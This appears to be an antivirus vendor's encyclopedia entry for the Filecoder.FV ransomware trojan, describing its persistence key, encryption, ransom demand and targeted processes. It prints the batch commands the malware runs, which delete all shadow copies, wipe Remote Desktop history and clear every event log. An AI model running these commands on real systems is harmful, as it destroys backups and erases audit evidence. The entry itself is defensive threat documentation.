Win32/Filecoder [Threat Name] go to Threat

Win32/Filecoder.FV [Threat Variant Name]

Category trojan
Size 311296 B
Detection created Jan 12, 2017
Detection database version 14758
Aliases Trojan-Ransom.Win32.Blocker.kfgf (Kaspersky)
  Trojan.Encoder.11539 (Dr.Web)
  Ransom:Win32/Ergop.A (Microsoft)
  Ransom.CryptXXX (Symantec)
Short description

Win32/Filecoder.FV is a trojan that encrypts files on local drives. To decrypt files, the user is asked to send information/certain amount of money via the Bitcoin payment service.

Installation

When executed, the trojan copies itself into the following location:

  • %allusersprofile%\­%malwarefilename%

In order to be executed on system start, the trojan sets the following Registry entry:

  • [HKEY_CURRENT_USER\­Software\­Microsoft\­Windows\­CurrentVersion\­RunOnce]
    • "CertificatesCheck" = "%malwarefilepath%"
Payload information

Win32/Filecoder.FV is a trojan that encrypts files on local drives.


The trojan searches for files with the following file extensions:

  • *.*

It avoids files from the following directories:

  • Avast
  • AVG
  • Avira
  • Chrome
  • Common Files
  • COMODO
  • Dr.Web
  • ESET
  • Internet Explorer
  • Kaspersky Lab
  • McAfee
  • Microsoft
  • Microsoft Help
  • Microsoft Shared
  • Microsoft.NET
  • Movie Maker
  • Mozilla Firefox
  • ntldr
  • NVIDIA Corporation
  • Opera
  • Outlook Express
  • ProgramData
  • spytech software
  • Symantec
  • Symantec_Client_Security
  • sysconfig
  • system volume information
  • Temp
  • Windows
  • Windows App Certification Kit
  • Windows Defender
  • Windows Kits
  • Windows Mail
  • Windows Media Player
  • Windows Multimedia Platform
  • Windows NT
  • Windows Phone Kits
  • Windows Phone Silverlight Kits
  • Windows Photo Viewer
  • Windows Portable Devices
  • Windows Sidebar
  • WindowsPowerShell
  • Wsus
  • YandexBrowser

The trojan encrypts the file content.


The extension of the encrypted files is changed to:

  • %filepath%.crypt

The RSA, DES encryption algorithm is used.


To decrypt files, the user is asked to send information/certain amount of money via the Bitcoin payment service.


When searching the drives, the trojan creates the following file in every folder visited:

  • how_to_back_files.html

It contains the following text:

Other information

The trojan creates the following files:

  • %temp%\­__t%variable%.tmp.bat

A string with variable content is used instead of %variable% .


It contains the following text:

  • @echo off
  • vssadmin.exe Delete Shadows /All /Quiet
  • reg delete "HKEY_CURRENT_USER\­Software\­Microsoft\­Terminal Server Client\­Default" /va /f
  • reg delete "HKEY_CURRENT_USER\­Software\­Microsoft\­Terminal Server Client\­Servers" /f
  • reg add "HKEY_CURRENT_USER\­Software\­Microsoft\­Terminal Server Client\­Servers"
  • cd %userprofile%\­documents\­
  • attrib Default.rdp -s -h
  • del Default.rdp
  • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

The file is then executed.


The trojan terminates processes with any of the following strings in the name:

  • sql
  • outlook
  • ssms
  • postgre
  • 1c
  • excel
  • word

Please enable Javascript to ensure correct displaying of this content and refresh this page.